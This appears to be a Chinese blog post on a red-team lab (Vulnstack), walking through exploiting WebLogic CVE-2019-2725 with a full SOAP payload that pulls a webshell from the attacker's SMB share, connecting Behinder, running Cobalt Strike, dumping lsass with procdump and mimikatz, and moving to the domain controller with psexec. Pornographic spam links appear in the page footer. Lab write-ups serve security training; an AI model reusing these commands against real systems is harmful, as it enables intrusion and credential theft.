<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          靶場(chǎng)實(shí)戰(zhàn) | ATT&CK實(shí)戰(zhàn) Vulnstack 紅隊(duì)(二)

          共 3711字,需瀏覽 8分鐘

           ·

          2022-03-01 14:57

          本文來自“白帽子社區(qū)知識(shí)星球”

          作者:Snakin



          白帽子社區(qū)知識(shí)星球

          加入星球,共同進(jìn)步
          01

          域環(huán)境初始化
          DCIP:10.10.10.10 OSWindows 2012(64)應(yīng)用:AD
          WEBIP1:10.10.10.80 IP2:192.168.111.80 OSWindows 2008(64)應(yīng)用:Weblogic 10.3.6 MSSQL 2008
          PCIP1:10.10.10.201 IP2:192.168.111.201 OSWindows 7(32)應(yīng)用:
          攻擊機(jī)IP:192.168.111.5 OSKali


          02

          weblogic漏洞利用

          nmap掃描

          nmap -p- -T5 192.168.111.80 -o web


          -p- 表示掃描所有端口;?


          -T5 指定掃描過程使用的時(shí)序,總共有6個(gè)級(jí)別(0-5),級(jí)別越高,掃描速度越快, 但也容易被防火墻或IDS檢測(cè)并屏蔽掉,在網(wǎng)絡(luò)通訊狀況較好的情況下推薦使用T4。


          -o 保存掃描結(jié)果到文件web



          常用端口是開放狀態(tài)1433是mssql,7001我們知道是weblogic服務(wù),因?yàn)槲覀兦懊媸止?開啟的??紤]weblogic服務(wù)漏洞,找到WeblogicScan工具掃一下。(WeblogicScan工具下載鏈接請(qǐng)?jiān)诤笈_(tái)回復(fù)“工具鏈接”)


          python3 WeblogicScan.py -u 192.168.111.80 -p 7001



          發(fā)現(xiàn)一個(gè)漏洞


          CVE-2019-2725漏洞描述

          ? ? ? ?這是一個(gè)Weblogic反序列化遠(yuǎn)程代碼執(zhí)行漏洞。部分版本 WebLogic中默認(rèn)包含的 wls9_async_response 包,為WebLogic Server提供異步通 訊服務(wù)。由于該WAR包在反序列化處理輸入信息時(shí)存在缺陷,攻擊者可以發(fā)送精心 構(gòu)造的惡意 HTTP 請(qǐng)求,獲得目標(biāo)服務(wù)器的權(quán)限,在未授權(quán)的情況下遠(yuǎn)程執(zhí)行命令。


          03

          啟動(dòng)smbserver共享文件服務(wù)

          我們需要先把/root/Behinder/server/shell.jsp webshell木馬程序上傳weblogic服務(wù)器上。然后再使用冰蝎連接shell.jsp木馬程序。


          impacket-smbserver share /root/桌面/Behinder/server &


          POC:

          POST /_async/AsyncResponseService HTTP/1.1
          Host: 192.168.111.80:7001
          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
          AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98
          Safari/537.36
          Accept:
          text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,
          image/apng,*/*;q=0.8
          Accept-Encoding: gzip, deflate
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Connection: close
          Content-Length: 841
          SOAPAction:
          Accept: */*
          User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
          Connection: keep-alive
          content-type: text/xml
          xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
          xmlns:wsa="http://www.w3.org/2005/08/addressing"
          xmlns:asy="http://www.bea.com/async/AsyncResponseService">

          xx
          xx
          xmlns:work="http://bea.com/2004/06/soap/workarea/">



          cmd


          /c


          copy \\192.168.111.5\share\shell.jsp
          servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpk
          ys\war\1.jsp










          發(fā)包:



          202狀態(tài)碼:Accepted 表示服務(wù)器端已經(jīng)收到請(qǐng)求消息,但是尚未進(jìn)行處理。但是對(duì) 于請(qǐng)求的處理卻是無保證的,即稍后無法通過 HTTP 協(xié)議給客戶端發(fā)送一個(gè)異步請(qǐng) 求來告知其請(qǐng)求的處理結(jié)果。這個(gè)狀態(tài)碼被設(shè)計(jì)用來將請(qǐng)求交由另外一個(gè)進(jìn)程或者服 務(wù)器來進(jìn)行處理,或者是對(duì)請(qǐng)求進(jìn)行批處理的情形。


          問題:發(fā)現(xiàn)無法訪問共享的文件


          04

          使用漏洞利用工具上傳shell

          上傳冰蝎的馬



          啟動(dòng)冰蝎

          java -jar Behinder_v3.0_Beta6_linux.jar &



          冰蝎連接

          URL:http://192.168.111.80:7001/_async/shell.jsp
          密碼:rebeyond



          連接成功


          05

          域滲透

          CS上線:啟動(dòng)cs服務(wù)器,密碼是123456

          ./teamserver 192.168.111.5 123456 &

          啟動(dòng)客戶端

          ./start.sh &


          接下來創(chuàng)建一個(gè)監(jiān)聽器



          在Attacks中選擇



          選擇之后保存,再利用冰蝎上傳這個(gè)exe文件



          接下來在虛擬終端中運(yùn)行這個(gè)程序即可?

          打開會(huì)話,將命令執(zhí)行周期修改為2s



          查看當(dāng)前用戶身份,為admin賬戶


          06


          獲取 win 用戶明文密碼



          使用 procdump64+mimikatz 獲取win用戶明文密碼


          procdump64.exe 介紹:它的主要目的是監(jiān)控應(yīng)用程序的CPU異常動(dòng)向, 并在此異常 時(shí)生成crash dump文件, 供研發(fā)人員和管理員確定問題發(fā)生的原因。?


          lsass.exe 進(jìn)程概述:lsass.exe是一個(gè)系統(tǒng)進(jìn)程,用于微軟Windows系統(tǒng)的安全機(jī) 制。它用于本地安全和登陸策略。也就是說lsass.exe進(jìn)程運(yùn)行后,里面會(huì)保存用戶帳號(hào)和密碼信息。


          beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp


          參數(shù)說明:

          -accepteula參數(shù):指定是否自動(dòng)接受 Microsoft 軟件許可條款。所有無人參與安裝都需要此設(shè)置。-ma 參數(shù):生成full dump, 即包括進(jìn)程的所有內(nèi)存. 默認(rèn)的dump格式包括線程和句柄信息.


          解密,這里數(shù)字衛(wèi)士沒有攔擊并不說明 mimikatz 是免殺的,實(shí)際環(huán)境如果 mimikatz 不是免殺的需 要將 lsass.dmp 文件拖回本地放至相同的系統(tǒng)中進(jìn)行解密。


          shell mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
          "exit"> password.txt


          直接使用 download 命令下載,下載后會(huì)保存到程序目錄的 downloads 目錄。

          07

          使用CS進(jìn)行憑據(jù)搜集
          hashdump
          logonpasswords



          目前得到域用戶信息:


          域用戶名:de1ay\mssql          密碼:1qaz@WSX域用戶名:de1ay\administrator  密碼:1qaz@WSX?#這是DC域管理員用戶和密碼本地用戶名:WEB\de1ay ???????? 密碼:1qaz@WSX 該用戶是系統(tǒng)本地登錄系統(tǒng)用的。

          08

          獲取域控

          查看網(wǎng)絡(luò)信息找到域控

          beacon> shell ipconfig /all



          DNS 服務(wù)器 10.10.10.10 也就是域控。查看域控制器


          beacon> shell net group "domain controllers" /domain


          獲得:

          主機(jī)名:DC,完整主機(jī)是:DC.de1ay.com再確認(rèn)主機(jī)名為DCIP地址:beacon> shell ping dc或:beacon> shell ping DC


          成功ping通


          接下來查看域管理員

          shell net group "domain admins" /domain

          09

          連接域控服務(wù)器-反彈域控shell

          回到控制目標(biāo)主機(jī)的初始用戶賬戶下

          beacon> rev2self

          查看當(dāng)前的權(quán)限:

          beacon> getuid


          通過前面獲取到的DC的DE1AY\administrator賬戶信息,生成新的憑證。


          beacon> make_token DE1AY\administrator 1qaz@WSX


          創(chuàng)建新的監(jiān)聽實(shí)現(xiàn)中轉(zhuǎn),便于通過命名管道 psexec 通過 SMB Listener 橫向過去。



          名稱就叫smb這個(gè)后面要用。

          DC上線,jump會(huì)使用前面的憑證和smb監(jiān)聽器,完成登錄DC的過程.

          beacon> jump psexec DC smb或:jump?psexec?10.10.10.10?smb?#目標(biāo)機(jī)器可以是?DC?主機(jī)名,也可以是?IP


          拿下域控


          如果覺得本文不錯(cuò)的話,歡迎加入知識(shí)星球,星球內(nèi)部設(shè)立了多個(gè)技術(shù)版塊,目前涵蓋“WEB安全”、“內(nèi)網(wǎng)滲透”、“CTF技術(shù)區(qū)”、“漏洞分析”、“工具分享”五大類,還可以與嘉賓大佬們接觸,在線答疑、互相探討。

          ▼掃碼關(guān)注白帽子社區(qū)公眾號(hào)&加入知識(shí)星球▼


          瀏覽 103
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          評(píng)論
          圖片
          表情
          推薦
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  黄片视频网站入口 | 天天肏天天操 | 黄色无码影视 | 久久高清免费视频 | 智光AV |